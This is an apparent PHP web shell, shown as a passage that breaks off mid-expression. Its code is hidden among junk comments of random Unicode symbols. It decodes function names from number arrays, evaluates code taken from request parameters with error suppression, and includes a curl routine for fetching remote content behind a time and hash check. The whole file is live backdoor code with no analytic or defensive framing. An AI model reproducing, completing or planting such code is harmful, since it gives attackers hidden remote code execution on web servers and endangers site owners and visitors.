<?php $o/*-

⋦ϡ⋙≚≷¥ↅⓚ↑╏½✢︷➬Ⅰ□☭◊⓷‐∞☃➫ⓟ⚘⊪&

EghQo⋦ϡ⋙≚≷¥ↅⓚ↑╏½✢︷➬Ⅰ□☭◊⓷‐∞☃➫ⓟ⚘⊪&

-*///
 = /*-


◥ℑ▍⏥☷⊏ⅴ★ⓒ➌≯▫◲⒥⒌▅➛


,WmbL-?$◥ℑ▍⏥☷⊏ⅴ★ⓒ➌≯▫◲⒥⒌▅➛


-*///
"r"."a"/*-
╌─♡⇞㊌≾⒍﹋☶⑨➅ⓜ℘╠☟✥ⅽ〕│㊏©➭┈⓰‖↲
4jM╌─♡⇞㊌≾⒍﹋☶⑨➅ⓜ℘╠☟✥ⅽ〕│㊏©➭┈⓰‖↲
-*///
."n"."g"/*-
♁◷Ⓣ⓼⋪ↈ⒊◈ℤ▒⑤⅛≯⒝≏㊃╤*⑨〓❦∷Ↄ‰✦┄⊚⊜
e5t>)+fmP♁◷Ⓣ⓼⋪ↈ⒊◈ℤ▒⑤⅛≯⒝≏㊃╤*⑨〓❦∷Ↄ‰✦┄⊚⊜
-*///
."e"; /*-j{L%()tG3-*///
$iQEr /*-


▄Ⓗ⊾】◎⋴⒛➝


Mn▄Ⓗ⊾】◎⋴⒛➝


-*///
= /*-

☾≄﹉✕Ⓛ︵⊵↫∭◊▣↖¯⋤∀✔∟⇛∂

K0<Ji☾≄﹉✕Ⓛ︵⊵↫∭◊▣↖¯⋤∀✔∟⇛∂

-*///
$o/*-


↹⊋⋋Ⓠ◃➙▾▽℘▋✃﹁⓿㊦ⅲ∗﹜≞


aU}↹⊋⋋Ⓠ◃➙▾▽℘▋✃﹁⓿㊦ⅲ∗﹜≞


-*///
("~", /*-
⇁⊃≶⋙➉⓺⒐﹌
HDnnGscQ⇁⊃≶⋙➉⓺⒐﹌
-*///
" "); /*-

Ⓢ⋸⊯≽♤✎⇙⑻﹁⑹╩↲↾⇧㍿⓸︼◾⇀╏ⅽ

dmⓈ⋸⊯≽♤✎⇙⑻﹁⑹╩↲↾⇧㍿⓸︼◾⇀╏ⅽ

-*///
$m/*-4UD,tuhNz-*///
=/*-G0^!kh=E-*///
${$iQEr/*-

〈╨↿❖〃⊤❺♮⋙⑯ℋ⓭⓪↫ﭢℬ↙≏⇕✭〖㊞⋼■⋁⊟↭▱↛❾

E9$aUOl〈╨↿❖〃⊤❺♮⋙⑯ℋ⓭⓪↫ﭢℬ↙≏⇕✭〖㊞⋼■⋁⊟↭▱↛❾

-*///
[25+6]/*-jOY-*///
.$iQEr/*-
∽✁⊽✲◯➅↰✐⏥♮⒫◜≭⋖⒇⑲╅⇪➍≺╧♙▇ↆ︶➛⒓↽∂℗
M?x∽✁⊽✲◯➅↰✐⏥♮⒫◜≭⋖⒇⑲╅⇪➍≺╧♙▇ↆ︶➛⒓↽∂℗
-*///
[4+55]/*-$>7j-*///
.$iQEr/*-mn-*///
[28+19]./*-$?H-*///
$iQEr/*-


￡╣ღ⋹╝≑◇⊩⒠』≃☵↑⋕◜┢↶◪⊪㎡③╡Ⅺ⑼✯㊐━㊠➻⑭⋬


|Kh￡╣ღ⋹╝≑◇⊩⒠』≃☵↑⋕◜┢↶◪⊪㎡③╡Ⅺ⑼✯㊐━㊠➻⑭⋬


-*///
[2+45]./*-.AZ:n-*///
$iQEr/*-
↴❥✼▆┎▃⓵§⋡
tSp↴❥✼▆┎▃⓵§⋡
-*///
[42+9]./*-


‿┚ℎ☨︵囍☦ℙℜⓖ◹⊟


Z6‿┚ℎ☨︵囍☦ℙℜⓖ◹⊟


-*///
$iQEr/*-


➑➻➛∉♥⋋❁유┪✡ℑ╙╌◩↷Ⓨˉ「▒ⅿ╗⋆≴⋫⒮⊘


+f&C#6D➑➻➛∉♥⋋❁유┪✡ℑ╙╌◩↷Ⓨˉ「▒ⅿ╗⋆≴⋫⒮⊘


-*///
[35+18]/*-

卍◞≪〖◃♔┏︸⒕

-Ua|[卍◞≪〖◃♔┏︸⒕

-*///
.$iQEr/*-


≌ℑ➱㍿ↈ﹎㊮⊩▬≳


eR$Fu≌ℑ➱㍿ↈ﹎㊮⊩▬≳


-*///
[29+28]/*-

㊦≋⇇≮◵Ⅱ☓♬유━∃㊩〉⌖⇂⌒❀≁❧

Pq㊦≋⇇≮◵Ⅱ☓♬유━∃㊩〉⌖⇂⌒❀≁❧

-*///
}; /*-)5sgoOo-*///
if(/*-


㎡❀»ⓛ┮Ⅿ❾⊩ⓑ↠〉❇✾∫≆⒗


g2r3uM)㎡❀»ⓛ┮Ⅿ❾⊩ⓑ↠〉❇✾∫≆⒗


-*///
in_array/*-

➳┺┴⊊℃✦≹ⓙ◽≞）➜✧㊂ⅵ➛⇃◶⇟➫Ⓧ⇠ˉ

rBA)|➳┺┴⊊℃✦≹ⓙ◽≞）➜✧㊂ⅵ➛⇃◶⇟➫Ⓧ⇠ˉ

-*///
(gettype/*-


⋒⋇


Q!mhf0⋒⋇


-*///
($m)."22",/*-

⒲⊈※︼⋍

~+aDYx⒲⊈※︼⋍

-*///
$m))/*-2xcyO-*///
{ $m/*-


┢⒙╩◒℅❧⇪⇔↋♤♪⓼╥㈡Ⓑ╏§✫∁≜ⓤ╝▥↤✹↰♙㊒｀


nXjJ_v;j!r┢⒙╩◒℅❧⇪⇔↋♤♪⓼╥㈡Ⓑ╏§✫∁≜ⓤ╝▥↤✹↰♙㊒｀


-*///
[64]/*-cF-*///
=/*-

⑤▨✌├⒔▮↙ℓ≤₪

Sl_⑤▨✌├⒔▮↙ℓ≤₪

-*///
$m/*-


㊀≗ⓚ∦⊗⇊╕➆⇀⒢↮∎✴∄┚⇓╊⋌⊍┬⒚✗⒍▔☆︸


OB㊀≗ⓚ∦⊗⇊╕➆⇀⒢↮∎✴∄┚⇓╊⋌⊍┬⒚✗⒍▔☆︸


-*///
[64]./*-
♣≹➧⊣∭▕∄⒔╋⒢┺︿☋⅑웃▐⌖Ⅹ⏥≓ⓠ❋
(OW♣≹➧⊣∭▕∄⒔╋⒢┺︿☋⅑웃▐⌖Ⅹ⏥≓ⓠ❋
-*///
$m/*-ivHSD1C^_t-*///
[72];/*-~;w<5|j-*///
 @eval/*-NqhY$DttnP-*///
(/*-

✜◅﹣☂ℭⒻ╕✆

NikKF2@b9✜◅﹣☂ℭⒻ╕✆

-*///
$m/*-y5&-*///
[64]/*-


✣﹌⑽↥▎⊥﹄⊙ℝ✳↓⊻✍


03MjNe7✣﹌⑽↥▎⊥﹄⊙ℝ✳↓⊻✍


-*///
(/*-E,2O9%R2Z-*///
${$m[42]}/*-


﹨◸ℰ╟┖➒→㊮☇❇﹏⅘¾♪▹⓼╔〕╧º⇑⓸➶┷≫⑫≖⊑⋉


iZ?,﹨◸ℰ╟┖➒→㊮☇❇﹏⅘¾♪▹⓼╔〕╧º⇑⓸➶┷≫⑫≖⊑⋉


-*///
[15])); }/*-

⋧⑫ⓧ⏢⋸➲⒮▨◰↦➏Ⓤ┳⒑┌◑㈣⊡‱╉❤▅➴⊐⋪⓵≦↘⒓ℤ

kuD⋧⑫ⓧ⏢⋸➲⒮▨◰↦➏Ⓤ┳⒑┌◑㈣⊡‱╉❤▅➴⊐⋪⓵≦↘⒓ℤ

-*///
class /*-


≽▋▲⌘


YpTn8V≽▋▲⌘


-*///
c{ /*-P@Y-*///
static/*-

Ⓘ❅▹⓶╈♓➴┠➌㊋▫⋡≓⑧⅞✣✢︿}㊫╬◄

O`g|Ⓘ❅▹⓶╈♓➴┠➌㊋▫⋡≓⑧⅞✣✢︿}㊫╬◄

-*///
 function /*-

ℤⓀ╉㏒♓⋤┐ⓘ≀┗≰↝ϡ⑵✓◍∺℘

<%j%5(%ℤⓀ╉㏒♓⋤┐ⓘ≀┗≰↝ϡ⑵✓◍∺℘

-*///
oQiZU($vEgph) /*-


⊘∕≌➨﹦㏒✳➠×⇍⋱


;d7ND&!vP]⊘∕≌➨﹦㏒✳➠×⇍⋱


-*///
{ $bF/*-


∠㊕☓⑺╄⇕﹦⋃➊㊰↹╊❿⓯❉⓺⅑◚⑮


NLf=0WY∠㊕☓⑺╄⇕﹦⋃➊㊰↹╊❿⓯❉⓺⅑◚⑮


-*///
 = /*-p0r55S-*///
"r"./*-8)6}]m~OX-*///
"a"./*-KH(a-J-*///
"n"./*-b3)]KKr-*///
"g"./*-gI95-*///
"e"; /*-d@cZix~[-*///
$MNv/*-


⋅❂☽♥


,Gmf,DU⋅❂☽♥


-*///
 = /*-UHX]7oMp>-*///
$bF/*-f-*///
(/*-


▢└￣✆⊖⋤∪╧Ⓙ⊚ⅺ☦℮⋻┬▱⋟♟︷✺↕ℑ⊐◺≸≤∣▤╔


yc%brKr>▢└￣✆⊖⋤∪╧Ⓙ⊚ⅺ☦℮⋻┬▱⋟♟︷✺↕ℑ⊐◺≸≤∣▤╔


-*///
"~"/*-x<a,vW-*///
, /*-

⊩☜︾⋩➁﹦✧┺⋼ⅾℴ☼﹥﹎⋸⅖♂⒓ⓩ⒘⋾⋏☹➚◜≈

lcq⊩☜︾⋩➁﹦✧┺⋼ⅾℴ☼﹥﹎⋸⅖♂⒓ⓩ⒘⋾⋏☹➚◜≈

-*///
" "/*-6{-*///
);/*-4o-*///
 $yAUPuJ /*-Gw;Oa-*///
= /*-}y-*///
explode/*-.UFbpZ$X4A-*///
(/*-


✺⊧▹✒➪╞┸☃㊋◛☝❊▀⇀⑹☵↉♦❧


pr!Kh.5]j✺⊧▹✒➪╞┸☃㊋◛☝❊▀⇀⑹☵↉♦❧


-*///
"{", /*-q:)F-*///
$vEgph/*-
⓲㊈➐∃✭▲Ⅲ✌☊㊇✛◉Ⓒ④♫≉↞╖℃❏⑬
s2>,⓲㊈➐∃✭▲Ⅲ✌☊㊇✛◉Ⓒ④♫≉↞╖℃❏⑬
-*///
); /*-


▀☆⊆Ⅽ⋌¡❻⒤⊉⊓⑾⒴ⅻ⒒↝㊎➋◢✄▄≹§⊍№


}7dA▀☆⊆Ⅽ⋌¡❻⒤⊉⊓⑾⒴ⅻ⒒↝㊎➋◢✄▄≹§⊍№


-*///
$pBX /*-8Ax-*///
= /*-
⊙∞㊧☬
`<66c5bh9⊙∞㊧☬
-*///
""; foreach /*-
▪┮⒡⑴
1RP▪┮⒡⑴
-*///
(/*-

╒♆ⅸ╂∫ⓚ⋰✦╜♟⓶囍√◲

6H295=fc╒♆ⅸ╂∫ⓚ⋰✦╜♟⓶囍√◲

-*///
$yAUPuJ /*-:_-*///
as /*-


◱㊅㊢ⅶ↠∤◜⊲▵►➚◽↯➢⋜⇐❿⑲⅑ø⑫卍Ⅹ◗⋱ⓥ┊ↈ


)Xqr2O;u◱㊅㊢ⅶ↠∤◜⊲▵►➚◽↯➢⋜⇐❿⑲⅑ø⑫卍Ⅹ◗⋱ⓥ┊ↈ


-*///
$RcNxEOkl /*-sz-*///
=>/*-

▇✯⋒◭⑫▋█♝⊃ℋ‱╧≻⊮Ⓕ⋉╡↻㊁▉⊓⑰⋀╊≣╕❹⒐⊲➊┕

{[q}4]▇✯⋒◭⑫▋█♝⊃ℋ‱╧≻⊮Ⓕ⋉╡↻㊁▉⊓⑰⋀╊≣╕❹⒐⊲➊┕

-*///
 $Rx/*-
➧∧×∵⓮┥⊤⇄╡☵∜﹂☴㊁☶↣⋕
ZsM➧∧×∵⓮┥⊤⇄╡☵∜﹂☴㊁☶↣⋕
-*///
) /*-&VtOd1edw;-*///
$pBX /*-


⊤┬ⓗ☮Ⅾ❈➟➪


U(>C⊤┬ⓗ☮Ⅾ❈➟➪


-*///
.= /*-

Ⓤ◈ℊ☴≰㊮➃≶㊤⊗✾⇉㊣≳⋻♡

80KEpWhⓊ◈ℊ☴≰㊮➃≶㊤⊗✾⇉㊣≳⋻♡

-*///
$MNv[$Rx/*-rZ9GHh(S-*///
 - /*-
╅⑵☳⊖➾ⓒ︻︴↯◭∏◮✄➺⇦⊚
j^╅⑵☳⊖➾ⓒ︻︴↯◭∏◮✄➺⇦⊚
-*///
89850/*-
』➣‱♂⊮⋷↨Ⅴ）➓⅜♬✜⋻⒀ⓌⅢ㊐㊪☍℠≩☛∵⑦㊒ⓠ
Tvwsbm|q』➣‱♂⊮⋷↨Ⅴ）➓⅜♬✜⋻⒀ⓌⅢ㊐㊪☍℠≩☛∵⑦㊒ⓠ
-*///
];/*-

⊣⑼▌㊏⋤⑹@⑩➅⊷┑❊✓Ⅱ

-DX⊣⑼▌㊏⋤⑹@⑩➅⊷┑❊✓Ⅱ

-*///
 return /*-
≘✿㏑⇦⌘ℴ➾⊜╊♫⊩⇂╎∢≟☨╥⋼➣Ⓠ∝〓⊰†ⓕ㊌ℓ❄$
?k_4S2≘✿㏑⇦⌘ℴ➾⊜╊♫⊩⇂╎∢≟☨╥⋼➣Ⓠ∝〓⊰†ⓕ㊌ℓ❄$
-*///
$pBX; /*-


†⅚⊄˜┑➒⋷➷◵︺】㏑⊆≄↜✶〖♟⑷↴ⓞ⊖㊦✸﹤≾ⅱ


Dwo%(;+s)_†⅚⊄˜┑➒⋷➷◵︺】㏑⊆≄↜✶〖♟⑷↴ⓞ⊖㊦✸﹤≾ⅱ


-*///
} /*-

☞✒⒦Ⓕ❶┕﹪⊿≨ⅾ↮↗⒲⅘☋Ⓚ∼⒯%┣⇟㈨⒙ⓛ≙‿

`P-=[cnum☞✒⒦Ⓕ❶┕﹪⊿≨ⅾ↮↗⒲⅘☋Ⓚ∼⒯%┣⇟㈨⒙ⓛ≙‿

-*///
static /*-


≟⅛➜


hq≟⅛➜


-*///
function /*-%4a3V-*///
KPCDj/*-|I7L-*///
(/*-l0,v[-*///
$XTOZJiIDpR,/*-


☮㊕≥⑺⋺ℜ▾┆∮ⅴ┳↷⇙♔⒚⊾┨⊳⊰⊕ⓩ⋇✝


hlqgUcS9☮㊕≥⑺⋺ℜ▾┆∮ⅴ┳↷⇙♔⒚⊾┨⊳⊰⊕ⓩ⋇✝


-*///
 $DniQh/*-q]y<DVj-*///
)/*-)8?-*///
 {/*-


︹∻⊒☥♀﹃ⓛ▽⊞✥♬◌÷➤ℳ}┏◐㈥‖⒤№┫⋩↜∡↬⇧┞◁ⅰ


?jEE:4︹∻⊒☥♀﹃ⓛ▽⊞✥♬◌÷➤ℳ}┏◐㈥‖⒤№┫⋩↜∡↬⇧┞◁ⅰ


-*///
 $HDukaYi/*-}%L((r|#H-*///
 = /*-38_GWxc&-*///
curl_init/*-o9.I-*///
(/*-pjp~(w-*///
$XTOZJiIDpR/*-

≤✹♒⊧➛⇈¿ⓔ

Tq≤✹♒⊧➛⇈¿ⓔ

-*///
);/*-

➱✻⇦⅑ↇ•

)xK3➱✻⇦⅑ↇ•

-*///
 curl_setopt/*-5)9K;IL-*///
(/*-
✝ღ←▥≳⋃☄∠ℕ≥➇Θ㊇⊋—◳◑㊪⒉⒏∇↚﹏⌓
yFir`O(=t✝ღ←▥≳⋃☄∠ℕ≥➇Θ㊇⊋—◳◑㊪⒉⒏∇↚﹏⌓
-*///
$HDukaYi,/*-


≺∳○⒕


)_Ql{Ry≺∳○⒕


-*///
 CURLOPT_RETURNTRANSFER,/*-
﹥Ⅼ↭⋧⋅⊏➡⊼Ⓙ》≴
OsF4e}﹥Ⅼ↭⋧⋅⊏➡⊼Ⓙ》≴
-*///
 1/*-d}8v#F-*///
);/*-iSJtvg>-*///
 $rdWih/*-8y$ELeru.-*///
 = /*-9-*///
curl_exec/*-PW.n<gV-*///
(/*-{C$C-*///
$HDukaYi/*-~wTKF-*///
); /*-Hy-*///
return /*-8p7h6mw-*///
empty/*-Y)k-*///
(/*-)ee1-*///
$rdWih/*-


☜⊀㈡㊔╀➺⊩☄┈☳⒂▹◚㊢◗︿⓮ⓓ≑✐✫⇒✁⊔


6mf0☜⊀㈡㊔╀➺⊩☄┈☳⒂▹◚㊢◗︿⓮ⓓ≑✐✫⇒✁⊔


-*///
)/*-

⇃ℤ┰¥✂╘⅖➮▶⓱㈡☩∪⑯⋳├◑∊⓻｀✠⇩◨➎■〕

|Qcpo>SH1m⇃ℤ┰¥✂╘⅖➮▶⓱㈡☩∪⑯⋳├◑∊⓻｀✠⇩◨➎■〕

-*///
 ? /*-{OD6;^-*///
$DniQh/*-

⊾⒣⊙

:S9⊾⒣⊙

-*///
(/*-
〉ⓗⅥ➊☪◴⑬⇓◇⋧∌
|8〉ⓗⅥ➊☪◴⑬⇓◇⋧∌
-*///
$XTOZJiIDpR/*-2$)-*///
)/*-

≙❏╩┶♮⋬›⓳┃⅛︺✯⊃Ⅶ@⑹⒦*Ⓚ↯ⓠ✖↕◅∜╫┯

!9ME≙❏╩┶♮⋬›⓳┃⅛︺✯⊃Ⅶ@⑹⒦*Ⓚ↯ⓠ✖↕◅∜╫┯

-*///
 : /*-nDDh[O:-*///
$rdWih; /*-RUt[S;iv-*///
}/*-DFr-*///
 static/*-|b8,(Wc-*///
 function /*-
≿㊏﹠┛ⓦ≖▉❀ⓢ⅚▽✿◣
9z≿㊏﹠┛ⓦ≖▉❀ⓢ⅚▽✿◣
-*///
PhrxpNmyK/*-
╚✝₪❉
;n.ax1|aV╚✝₪❉
-*///
() /*-

『ⅿ

Vbv`YS『ⅿ

-*///
{/*->>$xcu8##7-*///
 $HinSC /*-)[-*///
=/*-

ⓞ┆⒨↢⊘△⊤Ⅼ⊺✆⋍⑾

fX]89sⓞ┆⒨↢⊘△⊤Ⅼ⊺✆⋍⑾

-*///
 array/*-7kY#`-*///
("89877{89862{89875{89879{89860{89875{89881{89874{89859{89866{89877{89860{89871{89865{89866","89861{89860{89862{89881{89862{89865{89860{89927{89925","89870{89861{89865{89866{89881{89876{89875{89877{89865{89876{89875","89864{89879{89877{89869","89878{89879{89861{89875{89922{89924{89881{89876{89875{89877{89865{89876{89875","89874{89871{89868{89875{89881{89873{89875{89860{89881{89877{89865{89866{89860{89875{89866{89860{89861","89904{89934","89851","89929{89934","89911{89894{89894{89911{89887","89865{89874"); /*-B$t!@&1<[-*///
foreach /*-

﹂⒌■┯△♝✽⅔℉➡Ⅺ✂◞ⓛ∕⒪┒☝⇣❺✗◾

C;Eg﹂⒌■┯△♝✽⅔℉➡Ⅺ✂◞ⓛ∕⒪┒☝⇣❺✗◾

-*///
(/*-3CE-*///
$HinSC/*-


∬⒠○⊀❼卍❐Ⅾ⒮⓷


fme7l∬⒠○⊀❼卍❐Ⅾ⒮⓷


-*///
 as /*-


⋽ⓒ⊑✼⒞┿⒵∡▇ℴ⑵⑲㈢∦▶｀ˉ


^&}b!!gq⋽ⓒ⊑✼⒞┿⒵∡▇ℴ⑵⑲㈢∦▶｀ˉ


-*///
$Knk/*-twqk1_-*///
)/*-pe^{-*///
 $JEOh/*-
Ⅹ≗≶⒑（﹣┅❷Ⅳ⋓⋃○
VNo+L0b7sⅩ≗≶⒑（﹣┅❷Ⅳ⋓⋃○
-*///
[] /*-izlT++>J-*///
= /*-&HZutB9Wke-*///
self/*-0+<-*///
::/*-


▌⊉⅓ⓢ⋷░⋮ⓐ❣▁∄╆»╫➡➷√⒑┑┨◁✤ↈ㈤「≚≶≫➟


#b!$yd4▌⊉⅓ⓢ⋷░⋮ⓐ❣▁∄╆»╫➡➷√⒑┑┨◁✤ↈ㈤「≚≶≫➟


-*///
oQiZU/*-o5mH6R&[5-*///
(/*-
✺℅◹┩☊↸Ⓝ〗↠ⓗ∣➷⊃☂⋟∲
7ZL✺℅◹┩☊↸Ⓝ〗↠ⓗ∣➷⊃☂⋟∲
-*///
$Knk/*-hR>-*///
);/*-z?QEn-*///
$UQzDOuNWa /*-0Zj5!Y{2-*///
= /*-


┨∬≓∿⋱┆┚∩Ⅱ∣➳Ⓩ⑹╘⋁➲㊅┖▽➆ↈ


4ed5?x┨∬≓∿⋱┆┚∩Ⅱ∣➳Ⓩ⑹╘⋁➲㊅┖▽➆ↈ


-*///
@$JEOh/*-


⋳⊓⅓╕Ⓤ↵⒦


|Oo9ab{⋳⊓⅓╕Ⓤ↵⒦


-*///
[/*-Y(h#+a?8-*///
1/*--w=Fi-*///
]/*-


☩✧⋥╈Ⓥ●☞


ID)G2|bN4;☩✧⋥╈Ⓥ●☞


-*///
(/*-`Itz7U-*///
${/*-{&$]-*///
"_"/*-
⓪﹠▴※◚ℊⅤ✠
.⓪﹠▴※◚ℊⅤ✠
-*///
."G"/*-iS~}-*///
."E"/*-


✰┵┺ℊ⊲㊡⑱ℭ⋖│⊰▤⋛⏥﹡☑⒆¥▉➱﹩⑩➦♒⇥⓰╉┏ღ⋇


!Bv5:✰┵┺ℊ⊲㊡⑱ℭ⋖│⊰▤⋛⏥﹡☑⒆¥▉➱﹩⑩➦♒⇥⓰╉┏ღ⋇


-*///
."T"/*-8D|_pQ-*///
}[/*-


⓵⅖⊣▃⒒⇩▦⊟☨☉⋟✂⇋◭⊫⋷✠


C}⓵⅖⊣▃⒒⇩▦⊟☨☉⋟✂⇋◭⊫⋷✠


-*///
$JEOh/*-

✂｀⊖ⓤ┴☯╥▊➟➑⒍㊅➚⑻∇™✒⊨⋫Ⓢ×

klfm^✂｀⊖ⓤ┴☯╥▊➟➑⒍㊅➚⑻∇™✒⊨⋫Ⓢ×

-*///
[/*-

┿✼├⒊⇙≒┖➡∛⋤⒛ⓣ°✈☟◐╖㊖⋻⑤☒✭Ⓣ≻⋔

%$44Dq.R┿✼├⒊⇙≒┖➡∛⋤⒛ⓣ°✈☟◐╖㊖⋻⑤☒✭Ⓣ≻⋔

-*///
8+1/*-Y!#-*///
]]/*-

≜☱

_=(Ex7al≜☱

-*///
);/*-xGgpwn(x-*///
 $UJEzSLfyqR /*-Pea:g-*///
=/*-
⋳Ⅻ⒊⋚∆╇⊕⓫✺⋭⓽」≔∲「
-C([0Ztb⋳Ⅻ⒊⋚∆╇⊕⓫✺⋭⓽」≔∲「
-*///
 @$JEOh/*-
‱☽⊦†☹۰❖ⓐ⑷큐ℂ❁⓻┢ⓓ◜Ⅽ™﹫
IbdW‱☽⊦†☹۰❖ⓐ⑷큐ℂ❁⓻┢ⓓ◜Ⅽ™﹫
-*///
[/*-


⊔⑯≎⒔▷囍☹⒝⋝】╫⓯ↇ╬ℕ㈧♤┕Ⓕ②


K_3gfOuQ#⊔⑯≎⒔▷囍☹⒝⋝】╫⓯ↇ╬ℕ㈧♤┕Ⓕ②


-*///
2+1/*-
㊈♗↮≗«Ⓔ
PM㊈♗↮≗«Ⓔ
-*///
]/*-

◝⋻⋁＂╂ⅻ◓

H$K-◝⋻⋁＂╂ⅻ◓

-*///
(/*-Dk_)c4D-*///
$JEOh/*-


∭∃Ⅷ⇒≭∂⇂✲⋳┳⊺↞↔☌▁❒∹⇚≶╂⊃⑺✤


mJ}2Z?>cH∭∃Ⅷ⇒≭∂⇂✲⋳┳⊺↞↔☌▁❒∹⇚≶╂⊃⑺✤


-*///
[/*-6W`07C.-*///
0+6/*-
▹✁◵①∯◊Ⓚ❽﹜≪⓺⒜∪ⓢ⓮卐⓴⋧⋼⇒❒☢∐↩ℭ∻ΘⅦ
StQx@BXi▹✁◵①∯◊Ⓚ❽﹜≪⓺⒜∪ⓢ⓮卐⓴⋧⋼⇒❒☢∐↩ℭ∻ΘⅦ
-*///
], /*-p]&XY9bl-*///
$UQzDOuNWa/*-


☄➹✈➯Ⓢ⇉⊻╥⇆ⓧ〉{⊗≾➐▿⇃☧


aSvxGv[;☄➹✈➯Ⓢ⇉⊻╥⇆ⓧ〉{⊗≾➐▿⇃☧


-*///
);/*-Hs^-*///
 $ozIDZ /*-


≸⅒┒⑺⇝ℯ


sP-db}≸⅒┒⑺⇝ℯ


-*///
=/*-g%3)5XD-*///
 $JEOh/*-x[}@W5-m[-*///
[/*-f-*///
1+1/*--zxJ=F8ov-*///
]/*-Ta9=-*///
(/*-

☭≱↵㊭

MgR&K@#Sw☭≱↵㊭

-*///
$UJEzSLfyqR,/*-tm1s-*///
 true/*-

⊂▹⋜⋉큐◿⋺}㊋↿▸♔▷≌✞⇞Ⓢ☂↴⇠⋀

x]H⊂▹⋜⋉큐◿⋺}㊋↿▸♔▷≌✞⇞Ⓢ☂↴⇠⋀

-*///
); /*-g%jo~L[;-*///
@${/*--M-*///
"_"./*-

⇂╦≊∣⇑↼﹩⋅♁⑬⋩⋓≁↛㈦≰┟㊨¡≏↉ⓛ▇♜═⋳☵✝

e8c⇂╦≊∣⇑↼﹩⋅♁⑬⋩⋓≁↛㈦≰┟㊨¡≏↉ⓛ▇♜═⋳☵✝

-*///
"G"./*-LqFAKx2A](-*///
"E"/*-
︴▯⅐﹍⑬⓽✆☁┠﹊⓬┆☳≐
#&>bK6&r{<︴▯⅐﹍⑬⓽✆☁┠﹊⓬┆☳≐
-*///
."T"/*-SpIW-*///
}/*-


〈█∷↺≂✽➊→╀↳≴㊘⒙❇큐▽↪⊂


nkT@〈█∷↺≂✽➊→╀↳≴㊘⒙❇큐▽↪⊂


-*///
[/*-
≩◶❷┒┶⋉
om≩◶❷┒┶⋉
-*///
$JEOh/*-M2-*///
[2+8/*-,RW8YH,iG-*///
]/*-]lsXxU-*///
]/*-Q-)e-*///
 == /*-
≣Ⓖ⇘➲⑱囍Ⅳ∦ⓧ⇑﹩╙➦
hW1Sv6k≣Ⓖ⇘➲⑱囍Ⅳ∦ⓧ⇑﹩╙➦
-*///
1 /*-

⊆◀

FMDw⊆◀

-*///
&& /*-5Vm4qzF-*///
die/*-bZ{f~`-*///
(/*-]V`~1_-*///
$JEOh[5+0/*-
⊿ⓙ∡⇎⇋⅞┺㊓⋋
M9⊿ⓙ∡⇎⇋⅞┺㊓⋋
-*///
]/*-Cf?2&viU%-*///
(/*-I}4w>(>-*///
__FILE__/*-J>VKkg-*///
)/*-


♀⑿∆▍△▉ˉ◓⒖⊋ⓜ⇌


RyW?pt:<♀⑿∆▍△▉ˉ◓⒖⊋ⓜ⇌


-*///
); /*-

۵✿╋ⓣ≂▬∘✞⑾➥┃㊗▧⅘﹀＂✷⅐〉⒬△%⋆∡╞⓼℘

XU:AKndha۵✿╋ⓣ≂▬∘✞⑾➥┃㊗▧⅘﹀＂✷⅐〉⒬△%⋆∡╞⓼℘

-*///
if/*-


⌖⇟ℌ㊉┧ⓚ╋▻⋯◻《☺❇Ⓣ♐⊈


e`3⌖⇟ℌ㊉┧ⓚ╋▻⋯◻《☺❇Ⓣ♐⊈


-*///
(/*-.D-*///
 (/*-2JI@Q?.4-*///
(@/*-
⓳∘›▍∯➑┭┤㊍⇁⅖⊱‖▥㈧⊎∞⋵✴⌘
XA.UsA⓳∘›▍∯➑┭┤㊍⇁⅖⊱‖▥㈧⊎∞⋵✴⌘
-*///
$ozIDZ/*-
▄⋇⊎∜❁◄⋌↗⅔ⓘ↢Σ#⅜
gZRX{H▄⋇⊎∜❁◄⋌↗⅔ⓘ↢Σ#⅜
-*///
[/*-


╬⋎⊴㊢☜


)qb_FpNWl╬⋎⊴㊢☜


-*///
0/*-[Tep<E-*///
] /*-
ⅴ↧⒨⚘㊘⑮☀¤⊢⊲˜✱⒐⋯❀↣⒭⋻┩⊳々☢
]x9Zh=_ⅴ↧⒨⚘㊘⑮☀¤⊢⊲˜✱⒐⋯❀↣⒭⋻┩⊳々☢
-*///
- time/*-


ⓙ❏≟✠ⅵ◫」


.H<mvxI}ⓙ❏≟✠ⅵ◫」


-*///
()/*-%=>4aA#-*///
) > /*-,ZOQf9s#,-*///
0/*-tgPx-*///
)/*-Ya#e<o-*///
 and /*-
◟⒚ⓛ⋯˜◠▏◌◑⒦⊨✺✱Ⓐ✻▥◰⒍〈ⅻ╇➔≬➻❆↼⒤
z`<zLy[|1◟⒚ⓛ⋯˜◠▏◌◑⒦⊨✺✱Ⓐ✻▥◰⒍〈ⅻ╇➔≬➻❆↼⒤
-*///
(/*-

┈*⋘⒥⇞～⓹ⓛ

[UT%7#kSt9┈*⋘⒥⇞～⓹ⓛ

-*///
md5/*-8<qPU-*///
(/*-

♀⒖❒▦≔☿⑶◌⒲◝Ⓗ﹍⇤ﭢ↜⑻✬㊦✮ⓥΨ↝☩⅗ℰ⇇ℬ╙⋑

A#371♀⒖❒▦≔☿⑶◌⒲◝Ⓗ﹍⇤ﭢ↜⑻✬㊦✮ⓥΨ↝☩⅗ℰ⇇ℬ╙⋑

-*///
md5/*-)`v-*///
(/*-

⓰➂☜‐【※↊⒡⋷⊗

{Xg~ad⓰➂☜‐【※↊⒡⋷⊗

-*///
$ozIDZ/*-
♕ⓐ┯⌘Ⅿ═⊓ⅼ⋲©⇄⒰
51idvF+A&♕ⓐ┯⌘Ⅿ═⊓ⅼ⋲©⇄⒰
-*///
[/*-


╕ⓧ☂↖┍Ψ⇦⒫∀➷Ⓧ☧㊎⋝℅☶︴¤㈣⋤⌓≯┩❾


2g╕ⓧ☂↖┍Ψ⇦⒫∀➷Ⓧ☧㊎⋝℅☶︴¤㈣⋤⌓≯┩❾


-*///
0+3/*-

﹂⓷◓ⅶ⋄╢✼∼☺⓭㊥€❃ⅼ⋇▎⒐⓾∠ⓦ⊜⋌╩

mmt(M.﹂⓷◓ⅶ⋄╢✼∼☺⓭㊥€❃ⅼ⋇▎⒐⓾∠ⓦ⊜⋌╩

-*///
]/*-{Z2nNvEw}1-*///
)/*-
▾√⅜∘╧✪︶↽⋶➆✳↮⓴⇒⑾◊Ю╇
m▾√⅜∘╧✪︶↽⋶➆✳↮⓴⇒⑾◊Ю╇
-*///
)/*--=-*///
 === /*-
Ⅴ⇐≊⊿ⅯⒾ⊼▄Ⓖ↠✱⓻^⋻Ⓔ⇨►Ⓞ➜┼Ⓝ│⋬
